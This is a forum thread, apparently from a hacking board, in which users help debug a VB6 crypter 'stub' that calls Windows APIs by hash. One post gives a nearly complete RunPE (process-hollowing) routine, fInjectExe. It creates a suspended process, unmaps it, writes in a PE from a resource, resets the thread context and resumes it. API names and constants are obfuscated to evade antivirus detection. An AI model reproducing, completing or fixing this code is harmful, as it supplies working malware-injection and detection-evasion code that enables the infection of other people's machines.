[ASM+VB6][INVOKE] Llamas APIs sin declararlas - kInvoke.bas

Iniciado por Karcrack, 9 Abril 2010, 16:17 PM

0 Miembros y 3 Visitantes están viendo este tema.


Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...

Make sure you're generating the hashes using the complete function name... p.e MessageBoxA


Cita de: Karcrack en  1 Noviembre 2011, 03:49 AM
Well, if you're taking the Hashes correctly it must work fine... check there's no problem with DEP (Windows) or native/p-code...

Make sure you're generating the hashes using the complete function name... p.e MessageBoxA

I've generated the hashes correctly using each complete function name, I used the tool you shared with us.

I'm on Windows 7 x64 bits and I'm compiling in Native Code

I never got the CallAPIByHash working, never understood why :/

My Stub was using CallAPIByName and it was working...

[L]ord [R]NA

On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically


Cita de: [L]ord [R]NA en  1 Noviembre 2011, 16:09 PM
On 64bits maybe the hash would be different, check this with a Debugger or make a program to create Hashes automatically

I have no idea on how to do this... Could you help me doing this please?


The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...


Cita de: Karcrack en  1 Noviembre 2011, 19:01 PM
The hashes are the same... Can you post the code your using? Maybe the problem is with DEP...

I don't know with which API's it's not working, how do I know? I have Invoked RunPE/Resource and a few APIs in Main:

Main Module:
'fCallAPI ("KERNEL32"), ("RtlMoveMemory"), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile) ---> fCallAPI ("KERNEL32"), (&HCF14E85B), VarPtr(bFile(0)), VarPtr(bTemp(10)), UBound(bFile)
'fCallAPI "kernel32", "GetModuleFileNameW", 0, VarPtr(bBuff(0)), 1024 ---> fCallAPI "kernel32", &h45B06D8C, 0, VarPtr(bBuff(0)), 1024

Resource Module:
'hRsrc = fCallAPI(("Kernel32"), ("FindResourceW"), hMod, ResName, ResType) ---> hRsrc = fCallAPI(("Kernel32"), (&h3BD09A6B), hMod, ResName, ResType)
'hGlobal = fCallAPI(("Kernel32"), ("LoadResource"), hMod, hRsrc) ---> hGlobal = fCallAPI(("Kernel32"), (&h934E1F7B), hMod, hRsrc)
'lpData = fCallAPI(("Kernel32"), ("LockResource"), hGlobal) ---> lpData = fCallAPI(("Kernel32"), (&h9A4E2F7B), hGlobal)
'Size = fCallAPI(("Kernel32"), ("SizeofResource"), hMod, hRsrc) ---> Size = fCallAPI(("Kernel32"), (&h3F2A9609), hMod, hRsrc)
'fCallAPI ("Kernel32"), ("RtlMoveMemory"), VarPtr(B(0)), lpData, Size ---> fCallAPI ("Kernel32"), (&hCF14E85B), VarPtr(B(0)), lpData, Size
'fCallAPI ("Kernel32"), ("FreeResource"), hGlobal ---> fCallAPI ("Kernel32"), (&h54423F7C), hGlobal
'fCallAPI ("Kernel32"), ("FreeLibrary"), hMod ---> fCallAPI ("Kernel32"), (&h4DC9D5A0), hMod

And all API's in kRunPE:
Public Function fInjectExe(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
    Dim hModuleBase             As Long
    Dim hPE                     As Long
    Dim hSec                    As Long
    Dim ImageBase               As Long
    Dim gNumC                       As Long
    Dim tSTARTUPINFO(16)        As Long
    Dim tCONTEXT(50)            As Long
    Dim KERNEL32          As String
    Dim NTDLL             As String

    KERNEL32 = "KERNEL32"

    hModuleBase = VarPtr(bvBuff(0))

    If Not GetNumb(hModuleBase, fClngW("2")) = fClngW("&H5A4D") Then Exit Function

    hPE = hModuleBase + GetNumb(hModuleBase + fClngW("&H3C"))

    If Not GetNumb(hPE) = fClngW("&H4550") Then Exit Function

    ImageBase = GetNumb(hPE + fClngW("&H34"))

    tSTARTUPINFO(0) = fClngW("&H44")
    Call fCallAPI(KERNEL32, &H16B3FE88, 0, StrPtr(sHost), 0, 0, 0, fClngW("&H4"), 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
    Call fCallAPI(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)

    Call fCallAPI(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + fClngW("&H50"))), fClngW("&H3000"), fClngW("&H40"))
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + fClngW("&H54")), 0)

    For gNumC = 0 To GetNumb(hPE + fClngW("&H6"), fClngW("2")) - fClngW("1")
        hSec = hPE + fClngW("&HF8") + (fClngW("&H28") * gNumC)
        Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + fClngW("&HC")), hModuleBase + GetNumb(hSec + fClngW("&H14")), GetNumb(hSec + fClngW("&H10")), 0)
    Next gNumC

    tCONTEXT(0) = fClngW("65543")

    Call fCallAPI(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    Call fCallAPI(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + fClngW("&H8"), VarPtr(ImageBase), fClngW("&H4"), fClngW("0"))

    tCONTEXT(44) = ImageBase + GetNumb(hPE + fClngW("&H28"))
    Call fCallAPI(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
    Call fCallAPI(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)

    hProcess = tPROCESS_INFORMATION(0)
    fInjectExe = fClngW("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
    Call fCallAPI("NTDLL", &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function


The code is pretty confusing... it's hard to follow the calls without looking at the original API declarations neither the structure declaration... anyway looks like your passing the pointers incorrectly... can't help you much more... you should look at the functions return... using Msgbox() is the easiest way.. also the worst :laugh: